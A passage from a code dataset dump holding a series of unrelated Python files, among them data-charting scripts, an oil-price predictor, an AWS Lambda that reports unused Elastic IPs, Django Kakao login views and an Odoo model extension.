for row in datas:\n # 报错信息\n count_errinfo[row[13]] = count_errinfo.get(row[13], 0) + 1\n\n print(count_errinfo)\n return count_errinfo\n\n# 报错课程id信息分布\ndef errlessonid():\n # 实例化对象\n datas = read_csv()\n count_errlessonid = dict()\n\n for row in datas:\n # 报错课程统计\n count_errlessonid[row[1]] = count_errlessonid.get(row[1], 0) + 1\n\n print(count_errlessonid)\n return count_errlessonid\n\ndef chart_phone_mobile():\n\n index = []\n values = []\n data = sorted(phone_mobile().items(),key=lambda item:item[1],reverse=True)\n\n for i in range(10):\n index.append(data[i][0])\n values.append(data[i][1])\n\n # print(index)\n # print(values)\n fig, ax = plt.subplots(figsize=(16, 12))\n ax.bar(\n x = index,\n height=values,\n width=0.6,\n align=\"center\",\n linewidth=2.0\n )\n # plt.bar(df['sport_type'], df['score'])\n plt.xticks(rotation=-90)\n ax.set_title(\"Phonemobile\", fontsize=15)\n\n # plt.bar(index, values)\n plt.show()\n\ndef chart_phone_os():\n\n index = []\n values = []\n data = sorted(phone_os().items(),key=lambda item:item[1],reverse=True)\n\n for i in range(4):\n index.append(data[i][0])\n values.append(data[i][1])\n\n # print(index)\n # print(values)\n fig, ax = plt.subplots(figsize=(16, 12))\n ax.bar(\n x = index,\n height=values,\n width=0.6,\n align=\"center\",\n linewidth=2.0\n )\n # plt.bar(df['sport_type'], df['score'])\n ax.set_title(\"phone_os\", fontsize=15)\n\n # plt.bar(index, values)\n plt.show()\n\ndef chart_errinfo():\n\n index = []\n values = []\n data = sorted(errinfo().items(),key=lambda item:item[1],reverse=True)\n\n for i in range(3):\n index.append(data[i][0])\n values.append(data[i][1])\n\n # print(index)\n # print(values)\n fig, ax = plt.subplots(figsize=(16, 12))\n ax.bar(\n x = index,\n height=values,\n width=0.6,\n align=\"center\",\n linewidth=2.0\n )\n # plt.bar(df['sport_type'], df['score'])\n ax.set_title(\"errinfo\", fontsize=15)\n\n # plt.bar(index, values)\n plt.show()\n\ndef chart_errlessonid():\n\n index = []\n values = []\n data = sorted(errlessonid().items(),key=lambda item:item[1],reverse=True)\n\n for i in range(10):\n index.append(data[i][0])\n values.append(data[i][1])\n\n # print(index)\n # print(values)\n fig, ax = plt.subplots(figsize=(16, 12))\n ax.bar(\n x = index,\n height=values,\n width=0.6,\n align=\"center\",\n linewidth=2.0\n )\n # plt.bar(df['sport_type'], df['score'])\n ax.set_title(\"errlessonid\", fontsize=15)\n\n # plt.bar(index, values)\n plt.show()\n\ndef write_execl():\n pass\n\nif __name__ == '__main__':\n test_phone_mobile = phone_mobile()\n test_phone_os = phone_os()\n test_errinfo = errinfo()\n test_errlessonid = errlessonid()\n\n test1 = chart_phone_mobile()\n test2 = chart_phone_os()\n test3 = chart_errinfo()\n test4 = chart_errlessonid()","sub_path":"autotestplat_tools_development/autotest_service/tools/toollib/NCE/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"296367728","text":"import bezier\nimport networkx as nx\nimport numpy as np\n\n# This code is not mine. I've just changed some var names.\n# Author: Geoff Sims, @beyondbeneath\n# Link: https://github.com/beyondbeneath/bezier-curved-edges-networkx\n# Thank you!\n\ndef curved_edges(G, pos, dist_ratio=0.2, precision=20, polarity='random'):\n edges = np.array(G.edges())\n l = edges.shape[0]\n\n if polarity == 'random':\n rnd = np.where(np.random.randint(2, size=l)==0, -1, 1)\n else:\n vec = lambda x: np.vectorize(hash)(x)\n val = np.mod(vec(edges[:,0]) + vec(edges[:,1]),2)\n rnd = np.where(val==0,-1,1)\n \n u, inv = np.unique(edges, return_inverse = True)\n coords = np.array([pos[x] for x in u])[inv]\n coords = coords.reshape([edges.shape[0], 2, edges.shape[1]])\n coords_node1 = coords[:,0,:]\n coords_node2 = coords[:,1,:]\n \n should_swap = coords_node1[:,0] > coords_node2[:,0]\n coords_node1[should_swap], coords_node2[should_swap] =\\\n coords_node2[should_swap], coords_node1[should_swap]\n \n val = np.sum((coords_node1-coords_node2)**2, axis=1)\n dist = dist_ratio * np.sqrt(val)\n\n m1 = (coords_node2[:,1]-coords_node1[:,1])/\\\n (coords_node2[:,0]-coords_node1[:,0])\n m2 = -1/m1\n\n t1 = dist/np.sqrt(1+m1**2)\n v1 = np.array([np.ones(l),m1])\n coords_node1_displace = coords_node1 + (v1*t1).T\n coords_node2_displace = coords_node2 - (v1*t1).T\n\n t2 = dist/np.sqrt(1+m2**2)\n v2 = np.array([np.ones(len(edges)),m2])\n coords_node1_ctrl = coords_node1_displace + (rnd*v2*t2).T\n coords_node2_ctrl = coords_node2_displace + (rnd*v2*t2).T\n\n node_matrix = np.array([coords_node1, coords_node1_ctrl,\n coords_node2_ctrl, coords_node2])\n\n curveplots = []\n for i in range(l):\n nodes = node_matrix[:,i,:].T\n space = np.linspace(0,1,precision)\n curve = bezier.Curve(nodes, degree=3)\n curveplots.append(curve.evaluate_multi(space).T)\n \n curves = np.array(curveplots)\n return curves\n","sub_path":"MapSci/curved_edges.py","file_name":"curved_edges.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"331605361","text":"import data_functions as dataFun\n#from sklearn.metrics import accuracy_score\n#from sklearn.metrics import confusion_matrix\n#from sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.datasets import make_classification\nfrom sklearn.externals import joblib\n#import os.path\nimport time\nimport glob\n#import csv\n#import shutil\nimport pandas as pd\nimport math as m\nimport numpy as np\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport os\n#from pandas_datareader import data as pdr\n#from IPython.display import display\nimport requests\nimport sys\n#sys.path.insert(1, \"/Users/qw19176/Documents/Courses/codingchallenge/\")\n\npriceDF = dataFun.dataHub(\n url=\"https://datahub.io/core/oil-prices/r/wti-daily.csv\", import_new_data=True)\noilDF = dataFun.oilProduction()\ndf = dataFun.combineFrames(priceDF, oilDF)\n# dataFun.show_more(df, 200)\ndf = df[np.isfinite(df['Prices'])]\n#indices = np.arange(0, len(df))\n#df['indx']\n#df = pd.DataFrame(index = indices, data = df)\ndf = df.sort_values(by=['Date'])\ndf = df.reset_index().drop([\"index\"], axis=1)\n\ntoday = dt.today()\ndefaultDay = (today + timedelta(days=1)).strftime('%Y-%m-%d')\n# df2 = pd.DataFrame\n\n\n\nprint(\"Please enter the date you want have a prediction for (format: 'yyyy-mm-dd')\")\n\nwhile True:\n try:\n predDate = str(input())\n datey = dt.strptime(predDate, '%Y-%m-%d').strftime('%Y-%m-%d')\n if datey > defaultDay:\n print(\"Input date too far in future, currently only 1 day into the future is predictable\")\n raise ValueError\n if datey < '2000-01-01':\n print(\"Input date too far in the past, enter a more recent date\")\n raise ValueError \n \n except(ValueError):\n try:\n print(\"Date {} entered is not suitable\".format(datey))\n agree = \"n\"\n \n print(\"Do you want to default to {}? (Y/N)\".format(defaultDay))\n \n while True:\n try:\n agree = str(input()).lower()\n \n if agree == \"y\":\n datey = defaultDay\n break\n \n elif agree == \"n\":\n break\n \n else:\n print(\"Please choose Y or N!\")\n \n except ValueError:\n print(\"Please choose Y or N!\") \n \n except(NameError):\n print(\"Please enter a date in correct format (yyyy-mm-dd)!\")\n continue\n \n if agree == \"y\":\n break\n elif agree == \"n\":\n print(\"Please enter the date you want have a prediction for (format: 'yyyy-mm-dd')\")\n continue\n else:\n break\n \nprint(\"Please enter the current ({}) WTI Oil Price\".format(\n (dt.strptime(datey, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d')))\n\nwhile True:\n try:\n newPrice = float(input())\n except(ValueError):\n print(\"Please enter a number\")\n continue\n else:\n break\n\nif datey < defaultDay:\n try:\n newProd = float(df[df[\"Date\"] == datey]['Production of Crude Oil'])\n except(TypeError):\n try:\n newday = (dt.strptime(datey, '%Y-%m-%d') - timedelta(days=1)).strftime('%Y-%m-%d')\n newProd = float(df[df[\"Date\"] == newday]['Production of Crude Oil'])\n except(TypeError):\n try: \n newday = (dt.strptime(datey, '%Y-%m-%d') - timedelta(days=2)).strftime('%Y-%m-%d')\n newProd = float(df[df[\"Date\"] == newday]['Production of Crude Oil'])\n except(TypeError):\n try:\n newday = (dt.strptime(datey, '%Y-%m-%d') -\n timedelta(days=23)).strftime('%Y-%m-%d')\n newProd = float(df[df[\"Date\"] == newday]\n ['Production of Crude Oil'])\n except(TypeError):\n newProd = df['Production of Crude Oil'].iloc[-1]\nelse: \n newProd = df['Production of Crude Oil'].iloc[-1]\n \ndf = df[df[\"Date\"] < datey]\n\ndf = df.append({\"Date\": datey, \"Prices\": newPrice, \"Production of Crude Oil\": newProd}, ignore_index=True)\ndf[\"Date\"] = pd.to_datetime(df[\"Date\"])\n\n\ndef SMA(period, data):\n sma = data.rolling(window=period).mean()\n return sma\n\n\ndef ema(data, window=20):\n\n exp = data.ewm(span=window, adjust=False).mean()\n return exp\n\n\ndef bollinger(data, window=20):\n\n mid_band = SMA(window, data)\n std_dev = data.rolling(window=window).std()\n up_band = mid_band + 2*std_dev\n low_band = mid_band - 2*std_dev\n return low_band, up_band\n\n\ndef momentum(df, n):\n \"\"\"\n :param df: pandas.DataFrame \n :param n: \n :return: pandas.DataFrame\n \"\"\"\n M = pd.Series(df['Prices'].diff(n), name='Momentum_' + str(n))\n df = df.join(M)\n return df\n\n\ndef relative_strength_index(df, n=14):\n \"\"\"Calculate Relative Strength Index(RSI) for given data.\n \n :param df: pandas.DataFrame\n :param n: \n :return: pandas.DataFrame\n \"\"\"\n i = df.index.min()\n UpI = [0]\n DoI = [0]\n while i + 1 <= df.index[-1]:\n # UpMove = df.loc[i + 1, 'High'] - df.loc[i, 'High']\n # DoMove = df.loc[i, 'Low'] - df.loc[i + 1, 'Low']\n Move = df.loc[i, 'Prices'] - df.loc[i + 1, 'Prices']\n\n if Move > 0:\n UpD = Move\n else:\n UpD = 0\n UpI.append(UpD)\n if Move < 0:\n DoD = Move\n else:\n DoD = 0\n DoI.append(DoD)\n i = i + 1\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span=n, min_periods=n).mean())\n NegDI = pd.Series(DoI.ewm(span=n, min_periods=n).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name='RSI_' + str(n))\n df = df.join(RSI)\n return df\n\n\ndef rate_of_change(df, n):\n \"\"\"\n \n :param df: pandas.DataFrame\n :param n: \n :return: pandas.DataFrame\n \"\"\"\n M = df['Prices'].diff(n - 1)\n N = df['Prices'].shift(n - 1)\n ROC = pd.Series(M / N, name='ROC_' + str(n))\n df = df.join(ROC)\n return df\n\n\ndef macd(df, n_fast, n_slow):\n \"\"\"Calculate MACD, MACD Signal and MACD difference\n \n :param df: pandas.DataFrame\n :param n_fast: \n :param n_slow: \n :return: pandas.DataFrame\n \"\"\"\n EMAfast = pd.Series(df['Prices'].ewm(\n span=n_fast, min_periods=n_slow).mean())\n EMAslow = pd.Series(df['Prices'].ewm(\n span=n_slow, min_periods=n_slow).mean())\n MACD = pd.Series(EMAfast - EMAslow, name='MACD_' +\n str(n_fast) + '_' + str(n_slow))\n MACDsign = pd.Series(MACD.ewm(span=9, min_periods=9).mean(\n ), name='MACDsign_' + str(n_fast) + '_' + str(n_slow))\n MACDdiff = pd.Series(MACD - MACDsign, name='MACDdiff_' +\n str(n_fast) + '_' + str(n_slow))\n df = df.join(MACD)\n df = df.join(MACDsign)\n df = df.join(MACDdiff)\n return df\n\n\ndf[\"20dSMA\"] = SMA(20, df[\"Prices\"])\ndf[\"200dSMA\"] = SMA(20, df[\"Prices\"])\ndf[\"boll_lo\"] = bollinger(df['Prices'])[0]\ndf[\"boll_hi\"] = bollinger(df['Prices'])[1]\n\ndf = momentum(df, 14)\ndf = macd(df, 12, 26)\ndf = rate_of_change(df, 14)\ndf = relative_strength_index(df)\n\ndf[\"boll_hi\"] = pd.to_numeric(df[\"boll_hi\"])\ndf[\"boll_lo\"] = pd.to_numeric(df[\"boll_lo\"])\ndf[\"20dSMA\"] = pd.to_numeric(df[\"20dSMA\"])\ndf[\"200dSMA\"] = pd.to_numeric(df[\"200dSMA\"])\n\ndf[\"bollAmplitude\"] = df[\"boll_hi\"] - df[\"boll_lo\"]\ndf[\"distFromTopBoll\"] = df[\"boll_hi\"] - df[\"Prices\"]\ndf[\"distFromLowBoll\"] = df[\"boll_lo\"] - df[\"Prices\"]\ndf[\"20d200dDist\"] = np.abs(df[\"20dSMA\"] - df[\"200dSMA\"])\n\ntry:\n filename = sys.argv[1]\nexcept(NameError):\n print(\"Specified model does not exist\")\n abspath = str(os.getcwd()+\"/*.sav\")\n try:\n filename = glob.glob(abspath)[-1]\n print(\"Using latest model file {}\".format(filename))\n except(NameError):\n print(\"Model does not exist, exiting\")\nexcept(IndexError):\n print(\"No model specified\")\n abspath = str(os.getcwd()+\"/*.sav\")\n try:\n filename = glob.glob(abspath)[-1]\n print(\"Using latest model file {}\".format(filename))\n except(NameError):\n print(\"Model does not exist, exiting\")\n\nmodel = joblib.load(filename)\n#result = model.score(X_test, Y_test)\n#print(result)\nx_test = df.tail(1)\nx_test = x_test.drop([\"200dSMA\", \"Date\",\n \"Prices\", \"boll_lo\", \"boll_hi\", \"MACDsign_12_26\"], axis=1)\n\npred = model.predict(x_test)\nproba = model.predict_proba(x_test)\n\nif pred[0] == 0:\n print(\"The price of oil is likely to decrease tomorrow with probability {:.1%}\".format(proba[0][0]))\nelse:\n print(\"The price of oil is likely to increase tomorrow with probability {:.1%}\".format(\n proba[0][1]))\n\n\n","sub_path":"logReg_dev/Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":8834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"172704278","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nimport keras\nfrom keras.datasets import mnist\nfrom keras import backend as K\nfrom sklearn.datasets import load_iris\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder\n\n\ndef get_mnist_data():\n img_rows, img_cols = 28, 28\n num_classes = 10\n\n # the data, split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n if K.image_data_format() == \"channels_first\":\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n x_train = x_train.astype(\"float32\")\n x_test = x_test.astype(\"float32\")\n x_train /= 255\n x_test /= 255\n\n # convert class vectors to binary class matrices\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n return x_train, y_train, x_test, y_test, input_shape\n\n\ndef get_iris_data(test_size=0.2):\n iris_data = load_iris()\n x = iris_data.data\n y = iris_data.target.reshape(-1, 1)\n encoder = OneHotEncoder(sparse=False)\n y = encoder.fit_transform(y)\n train_x, test_x, train_y, test_y = train_test_split(x, y)\n return train_x, train_y, test_x, test_y\n\n\ndef set_keras_threads(threads):\n # We set threads here to avoid contention, as Keras\n # is heavily parallelized across multiple cores.\n K.set_session(\n tf.Session(\n config=tf.ConfigProto(\n intra_op_parallelism_threads=threads,\n inter_op_parallelism_threads=threads)))\n\n\ndef TuneKerasCallback(*args, **kwargs):\n raise DeprecationWarning(\"TuneKerasCallback is now \"\n \"tune.integration.keras.TuneReporterCallback.\")\n","sub_path":"python/ray/tune/examples/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"241572550","text":"import boto3\nclient = boto3.client('ec2')\nsnsClient = boto3.client('sns')\n\ndef lambda_handler(event,context):\n response = client.describe_addresses()\n eips = []\n for eip in response['Addresses']:\n if 'InstanceId' not in eip:\n eips.append(eip['PublicIp'])\n\n print(eips)\n\n # send email using sns\n if eips:\n snsClient.publish(\n TopicArn='paste ur arn here',\n Message = f\"Unused eips are {str(eips)}\",\n Subject = \"Unused EIPS\"\n )\n\n\n# lambda_handler(None,None)\n","sub_path":"unused-eip.py","file_name":"unused-eip.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"653995383","text":"from helper_tools import sanatize, remove_stopwords, make_ngrams, make_skipgrams, flatten\nfrom search import search, term_to_codes\nimport pandas as pd\n\ndef get_codes(matches):\n # helper function to match SNOMED synonyms to their code and FSN\n lis = []\n for item in matches:\n term = item[0]\n score = item[1]\n gram = item[2]\n codes = term_to_codes(term)\n for code in codes:\n lis.append([code, score, gram])\n return [list(flatten(x)) for x in lis]\n\nclass Searcher:\n def __init__(self, text):\n self.text = sanatize(text)\n self.original_text = text\n\n self.ngrams = make_ngrams(self.text)\n self.skipgrams = make_skipgrams(self.text)\n self.all_grams = list(set(self.ngrams + self.skipgrams)) # Ngrams + Skipgrams\n\n def __str__(self):\n return(f\"Original text is: {self.original_text} \\nSanatized text is: {self.text}\")\n\n def __repr__(self):\n return(f\"Original text is: {self.original_text} \\nSanatized text is: {self.text}\")\n\n def get_best_match(self, alpha=0.8, all_results=False):\n # Matches the full text to SNOMED CT as a single string\n match = search(self.text, alpha=alpha, all_results=all_results)\n return(match)\n\n def match_ngrams(self, alpha=0.8):\n matches = [[search(gram, alpha=alpha), gram] for gram in self.all_grams]\n matches = [x for x in matches if x[0]] # remove empty lists\n matches = [list(flatten(x)) for x in matches]\n matches = sorted(matches, key = lambda x: x[1], reverse=True) # sort by score\n matches = get_codes(matches) # add the FSN and code columns\n df = pd.DataFrame(matches, columns=['Matched Term', 'Fully Specified Name', 'Code', 'Score', 'Ngram'])\n df = df[['Ngram', 'Matched Term', 'Fully Specified Name', 'Code', 'Score']] # reorder\n\n # drop duplicates (only highest scores kept since list is sorted by score)\n df = df.drop_duplicates(subset='Matched Term')\n df = df.drop_duplicates(subset='Fully Specified Name')\n return df\n","sub_path":"searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"247326920","text":"#!/usr/bin/env python\n\"\"\"\nCVM profiles\n\"\"\"\nimport os\nimport numpy as np\nimport pyproj\nimport cst\n\n# data directory\npath = os.path.join('run', 'data') + os.sep\n\n# mesh\ny, x = np.loadtxt(path + 'station-list.txt', usecols=(1, 2)).T\nz_ = np.linspace(0.0, 500.0, 501)\nz, x = np.meshgrid(z_, x)\nz, y = np.meshgrid(z_, y)\n\n# cvms\nr, p, s = cst.cvms.extract(x, y, z, ['rho', 'vp', 'vs'])\nnp.save(path + 'CVMS-Rho.npy', r.astype('f'))\nnp.save(path + 'CVMS-Vp.npy', p.astype('f'))\nnp.save(path + 'CVMS-Vs.npy', s.astype('f'))\n\n# project to cvm-h coordinates\nproj = pyproj.Proj(**cst.cvmh.projection)\nx, y = proj(x, y)\n\n# cvmh\nr, p, s = cst.cvmh.extract(x, y, z, ['rho', 'vp', 'vs'], False, vs30=None, no_data_value='nan')\nnp.save(path + 'CVMH-Rho.npy', r.astype('f'))\nnp.save(path + 'CVMH-Vp.npy', p.astype('f'))\nnp.save(path + 'CVMH-Vs.npy', s.astype('f'))\n\n# cvmg\nr, p, s = cst.cvmh.extract(x, y, z, ['rho', 'vp', 'vs'], False)\nnp.save(path + 'CVMG-Rho.npy', r.astype('f'))\nnp.save(path + 'CVMG-Vp.npy', p.astype('f'))\nnp.save(path + 'CVMG-Vs.npy', s.astype('f'))\n\n","sub_path":"scripts/Chino-Hills/cvm-profiles.py","file_name":"cvm-profiles.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"120299556","text":"from knock30 import *\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl \n\nif __name__ == '__main__':\n word_count = defaultdict(int)\n for sentence in ktskaiseki():\n for word in sentence:\n word_count[word['surface']] += 1\n\n left = list()\n labels = list()\n height = list()\n mpl.rcParams['font.family'] = 'AppleGothic'\n\n for count, k in enumerate(sorted(word_count.items(), key = lambda x:x[1], reverse = True)):\n if count == 10:\n break\n left.append(count+1)\n labels.append(k[0])\n height.append(k[1])\n \n plt.bar(left, height)\n plt.xticks(left, labels)\n plt.show()\n","sub_path":"naruhisa/chapter04/knock37.py","file_name":"knock37.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"31519597","text":"import json, jwt, requests\n\nfrom django.views import View\nfrom django.http import JsonResponse\n\nfrom products.models import ProductOption\nfrom users.models import PurchaseHistory, User, Follow\nfrom users.utils import SignInDecorator\nfrom my_settings import SECRET_KEY, ALGORITHM\n\nclass SocialSignInView(View):\n def post(self, request):\n try:\n data = json.loads(request.body)\n\n kakao_access_token = data['access_token']\n kakao_user_info = requests.get('https://kapi.kakao.com/v2/user/me', headers={'Authorization':f'Bearer {kakao_access_token}'}).json()\n\n kakao_id = kakao_user_info.get('id', None)\n\n if not kakao_id:\n return JsonResponse({'MESSAGE':'INVALID_KAKAO_TOKEN'}, status=400)\n\n kakao_email = kakao_user_info['kakao_account'].get('email', None)\n\n user, is_created = User.objects.get_or_create(kakao_id=kakao_id, kakao_email=kakao_email)\n\n access_token = jwt.encode({'id': user.id}, SECRET_KEY, algorithm=ALGORITHM)\n\n return JsonResponse(\n {\n 'token' : access_token,\n 'user_id' : user.id,\n 'nickname': user.nickname if user.nickname else None,\n 'email' : user.kakao_email\n }, status=200)\n\n except KeyError:\n return JsonResponse({'MESSAGE': 'KEY_ERROR'}, status=400)\n\nclass NicknameView(View):\n def post(self, request, user_id):\n nickname = json.loads(request.body)['nickname']\n\n if User.objects.filter(nickname=nickname).exists():\n return JsonResponse({'MESSAGE':'NICKNAME_ALREADY_EXISTS'}, status=409)\n\n User.objects.filter(id=user_id).update(nickname=nickname)\n\n return JsonResponse({'MESSAGE':'UPDATED'}, status=200)\n\nclass FollowView(View):\n @SignInDecorator\n def get(self, request):\n followings = User.objects.filter(followed__follower=request.user.id)\n\n result = [{\n \"id\" : following.id,\n \"nickname\" : following.nickname,\n } for following in followings]\n\n return JsonResponse({\"response\":result}, status=200)\n \n @SignInDecorator\n def post(self, request):\n follow, is_created = Follow.objects.get_or_create(\n follower = request.user,\n followed = User.objects.get(id=json.loads(request.body)['user_id'])\n )\n\n if not is_created:\n follow.delete()\n return JsonResponse({'MESSAGE': 'UNFOLLOWED'}, status=200)\n \n return JsonResponse({'MESSAGE':'FOLLOWED'}, status=200)\n\nclass PurchaseHistoryView(View):\n @SignInDecorator\n def get(self, request):\n purchases = PurchaseHistory.objects.select_related('purchased_product', 'purchased_product__product').filter(user=request.user).order_by('-id')\n \n result = [{\n \"price\" : purchase.purchased_price,\n \"date\" : purchase.purchased_time.strftime(\"%Y-%m-%d\"),\n \"product\" : purchase.purchased_product.product.product_name,\n \"product_id\" : purchase.purchased_product.product.id,\n \"product_image\": purchase.purchased_product.product.thumbnail_url\n } for purchase in purchases]\n\n return JsonResponse({\"RESPONSE\":result}, status=200)\n\n @SignInDecorator\n def post(self, request):\n try:\n data = json.loads(request.body)\n print(data)\n PurchaseHistory.objects.create(\n user = request.user,\n purchased_product = ProductOption.objects.get(product_id=data['product_id']),\n purchased_quantity = 1,\n purchased_price = data['price'],\n paypal_payer_id = data['payerID'],\n paypal_payment_id = data['paymentID'],\n paypal_payment_token = data['paymentToken'],\n )\n\n return JsonResponse({'MESSAGE':'CREATED'}, status=201)\n \n except KeyError:\n return JsonResponse({'MESSAGE':'KEY_ERROR'}, status=400)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"596134711","text":"## example based on Stitch Videos example from VidPy website\n## https://antiboredom.github.io/vidpy/examples.html\n\n# import vidpy module\nfrom vidpy import Clip, Composition\n# import random module\nfrom random import random\n\n# load clips\nclip1 = Clip('videos/video1.mp4')\nclip2 = Clip('videos/video2.mp4')\nclip3 = Clip('videos/video3.mp4')\n\n# list of videos\nclips = [clip1, clip2, clip3]\n\n# maximum length is sixty seconds\n# try also 10 seconds, 1 second, 0.1 second\nremainingTime = 60\n\n# iterate through each clip\nfor clip in range(len(clips)):\n # select a random start\n randomStart = random() * clips[clip].duration\n # select a random duration\n randomDuration = random() * remainingTime\n # if the duration is possible\n if randomStart + randomDuration < clips[clip].duration:\n # calculate randomEnd\n randomEnd = randomStart + randomDuration\n # if the duration is not posible\n else:\n # randomEnd is the original duration of clip\n randomEnd = clips[clip].duration\n\n # update remainingTime\n remainingTime = remainingTime - (randomEnd - randomStart)\n\n # cut at the desired position\n clips[clip].cut(start=randomStart, end=randomEnd)\n\n# stitch all the cuts together\nstiched = Composition(clips, singletrack=True)\nstiched.save('randomMinute.mp4')\n","sub_path":"code/week4/02-stitchRandomMinute.py","file_name":"02-stitchRandomMinute.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"258720639","text":"import pandas as pd\nimport joblib\nfrom pushlib_utils import get_subs\nfrom custom_transformers import DictFilterer, ToSparseDF, exclude_u_sub\n\nvoting_clf = joblib.load('models/clf_ensemble.pkl')\nfull_pipeline = joblib.load('models/pipeline_ensemble.pkl')\nvoting_clf2 = joblib.load('models/clf_ensemble2.pkl')\nfull_pipeline2 = joblib.load('models/pipeline_ensemble2.pkl')\n\ndef pred_lean(name):\n dict = get_subs(name)\n if not dict:\n raise ValueError(f'User \\'{name}\\' does not exist')\n\n series = full_pipeline.transform([dict])\n h_stance = voting_clf.predict(series)[0]\n h_conf = max(voting_clf.predict_proba(series)[0])\n\n series2 = full_pipeline2.transform([dict])\n v_stance = voting_clf2.predict(series2)[0]\n v_conf = max(voting_clf2.predict_proba(series2)[0])\n\n return (h_stance, v_stance, h_conf, v_conf)\n\n# full_pipeline_nn = joblib.load('models/pipeline_nn.pkl')\n# model = joblib.load('models/clf_nn.pkl')\n#\n# def pred_lean_nn(names):\n# if type(names) == str: names = [names]\n# dict = [get_subs(name) for name in names]\n# inst = full_pipeline_nn.transform(dict).todense()\n# return model.predict_classes(inst)\n","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"66980278","text":"#!/usr/bin/python3\nimport os, platform, subprocess, re, psutil\nfrom jinja2 import Environment, FileSystemLoader\nfrom psutil._common import bytes2human\n\nINCLUDED_PARTITIONS = set(['/', '/etc/hosts'])\n\ndef get_system_info():\n system = {\n 'cpu_count': psutil.cpu_count(),\n 'free_memory': bytes2human(psutil.virtual_memory()[4]),\n 'total_memory': bytes2human(psutil.virtual_memory()[0]),\n 'disk_usage': []\n }\n\n partitions = psutil.disk_partitions()\n for p in partitions:\n if p.mountpoint in INCLUDED_PARTITIONS:\n usage = psutil.disk_usage(p.mountpoint)\n system['disk_usage'].append({\n 'mountpoint': p.mountpoint,\n 'total': bytes2human(usage.total),\n 'used': bytes2human(usage.used)\n })\n return system\n\nres = get_system_info()\n\nenv = Environment(loader=FileSystemLoader('/opt'))\ntemplate = env.get_template('template.html')\nhtml = template.render(page_title='Test job',\n text_title='Some info about system',\n cpu=res.get(\"cpu_count\"),\n total_memory=res.get(\"total_memory\"),\n free_memory=res.get(\"free_memory\"),\n disk=res.get(\"disk_usage\"))\n\nwith open('system_info.html', 'w') as f:\n f.write(html)","sub_path":"roles/nginx_container/files/get_param.py","file_name":"get_param.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"329641023","text":"from odoo import models, fields, api, _, exceptions\n\n\nclass Employee(models.Model):\n _inherit = \"hr.employee\"\n\n branch = fields.Many2one('asset.branch', string=\"Branch\")\n\n stock_location = fields.Many2one('stock.location', string=\"Stock Location\", related='branch.stock_location')\n\n identification_id = fields.Char(string=\"Staff ID\")\n\n _sql_constraints = [\n ('identification_id_unique',\n 'UNIQUE(identification_id)',\n \"Staff ID must be unique\"),\n\n ('work_email_unique',\n 'UNIQUE(work_email)',\n \"Work Email must be unique\"),\n\n ]\n","sub_path":"IT_asset_module/models/hr.py","file_name":"hr.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"27907405","text":"import json\nimport zipfile\n\nfrom jinja2.utils import htmlsafe_json_dumps # type: ignore\n\nfrom airflow.configuration import AIRFLOW_HOME\nfrom plugins.utils.utils import get_results_model, get_curves\nimport os\nimport pandas as pd\nfrom typing import List\nfrom pathlib import Path\nimport logging\n\nfrom qcos_addons.models import TighteningController\nfrom qcos_addons.models.result import ResultModel\n\n_logger = logging.getLogger(__name__)\n\n\nclass CurveResultDownloader:\n \"\"\"\n 用于批量下载曲线和结果\n \"\"\"\n\n def __init__(self):\n pass\n\n _cache_folder = os.path.join(AIRFLOW_HOME, 'downloads/contents')\n _max_download_count = os.environ.get('ENV_CURVE_MAX_DOWNLOAD_COUNT', 1000)\n\n @classmethod\n def cache_folder(cls):\n 